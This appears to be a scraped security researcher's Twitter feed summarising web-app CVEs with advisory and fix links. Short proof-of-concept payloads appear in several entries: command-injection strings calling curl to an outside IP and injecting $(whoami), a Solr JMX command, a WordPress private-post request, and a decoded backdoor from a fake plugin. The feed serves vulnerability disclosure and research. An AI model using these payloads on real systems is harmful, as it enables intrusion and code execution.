CVE-2020-7471: SQLI in Django: django.contrib.postgres.aggregates.StringAgg aggregation function was subject to SQL injection, using a suitably crafted delimiter. https://djangoproject.com/weblog/2020/feb/03/security-releases/ FIX: https://github.com/django/django/commit/eb31d845323618d688ad429479c6dda973056136
CVE-2020-5504 SQLI in phpMyAdmin: A malicious user could inject custom SQL in place of their own username when creating queries to this page https://www.phpmyadmin.net/security/PMASA-2020-1/ fix: https://github.com/phpmyadmin/phpmyadmin/commit/c86acbf3ed49f69cf38b31879886dd5eb86b6983
find a "new" way to get JDBC Deserialization RCE and it doesn't need any interceptor.
after digging deep into this commit https://github.com/phpmyadmin/phpmyadmin/commit/ff541af95d7155d8dd326f331b5e248fea8e7111 you will find it's actually an XSS... more details: https://xz.aliyun.com/t/6960 related issue: https://github.com/phpmyadmin/phpmyadmin/issues/15651 https://twitter.com/chybeta/status/1198515278746800128
CVE-2019-10758 post-auth Remote Code Execution in mongo-express < 0.54.0 via endpoints that use the `toBSON` method; however there are lots of no-auth mongo-express instances... shodan: https://www.shodan.io/search?query=Mongo+Express poc: https://github.com/masahiro331/CVE-2019-10758
Apereo Cas 4.2.X Remote Code Execution (execution=xxx_ZXlKaGJH...).
and about the Apereo Cas 4.1.X Remote Code Execution (execution=xxx_AAAAIg...):
https://twitter.com/pyn3rd/status/1001758511624212480
Thanks @pyn3rd
attack unauth scrapyd by deploying evil egg. author: @phithon_xg https://www.leavesongs.com/PENETRATION/attack-scrapy.html https://github.com/vulhub/vulhub/blob/master/scrapy/scrapyd-unacc/README.md
CVE-2019-15588 OS Command Injection in Nexus Repository Manager 2.x (bypass CVE-2019-5475) "createrepo" / "mergerepo" => /bin/bash -c curl${IFS}http://192.168.88.1:8000/ || /createrepo CVE-2019-15588 https://hackerone.com/reports/688270 CVE-2019-5475 https://hackerone.com/reports/654888 https://twitter.com/700_isnuoT/status/1203979987449237506
CVE-2019-19609 Strapi Framework Post-Auth RCE curl -H $'Authorization: Bearer [jwt]' ... --data {"plugin": "documentation && $(whoami > /tmp/whoami)","port":"1337"} https://bittherapy.net/post/strapi-framework-remote-code-execution/
CVE-2019-3990 User Enumeration Vulnerability GET /api/users/search?email=@test.com => {"code":400,"message":"username is required"} GET /api/users/search?username=t => User Enumeration https://github.com/goharbor/harbor/security/advisories/GHSA-6qj9-33j4-rvhg https://twitter.com/chybeta/status/1202027101957701632
Harbor Security Update: 1. Privilege Escalation 2. CVE-2019-19029 SQL Injection via user-groups 3. CVE-2019-19026 SQL Injection via project quotas 4. CVE-2019-19025 Missing CSRF protection 5. CVE-2019-3990 User Enumeration Vulnerability https://github.com/goharbor/harbor/security/advisories
CVE-2019-5096 GoAhead web server code execution vulnerability: An exploitable code execution vulnerability exists in the processing of multi-part/form-data requests within the base GoAhead web server application in versions v5.0.1, v4.1.1 and v3.6.5. https://talosintelligence.com/vulnerability_reports/TALOS-2019-0888
CVE-2019-19118: Privilege escalation in the Django admin. https://www.djangoproject.com/weblog/2019/dec/02/security-releases/
CVE-2019-19268 rConfig 3.9.2 Local Privilege Escalation: https://github.com/TheCyberGeek/CVE-2019-19268 CVE-2019-19268 + CVE-2019-16663 / CVE-2019-16662 = Full ROOT ACCESS about CVE-2019-16663 / CVE-2019-16662 https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/
CVE-2019-18622 SQLI in phpMyAdmin: A vulnerability was reported where a specially crafted database name can be used to trigger an SQL injection attack through the designer feature. https://www.phpmyadmin.net/security/PMASA-2019-5/
CVE-2019-12409: Apache Solr RCE vulnerability due to bad config default (JMX) https://lucene.apache.org/solr/news.html jython http://mjet.py xxx 18983 command super_secret "ls -la" https://mogwailabs.de/blog/2019/04/attacking-rmi-based-jmx-services/
backdoor in fake super socialat plugin (/wp-content/plugins/super-socialat/super_socialat.php) base64_decode("c3lzdGVtKCJ3aG9hbWkiKTs=") => system("whoami");
Henry Chen Retweeted
I get asked how I manage a full time job, content, steam, hacking on top of my personal life. I'm going to answer this once and only once: if you have time to waste on YouTube/Reddit you have time to learn how to hack. I go to bed an hour later and wake up an hour earlier.
WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts POC: GET /wordpress/?static=1&order=asc Fix: Remove the static query property https://github.com/WordPress/WordPress/commit/f82ed753cf00329a5e41f2cb6dc521085136f308 Analysis: https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/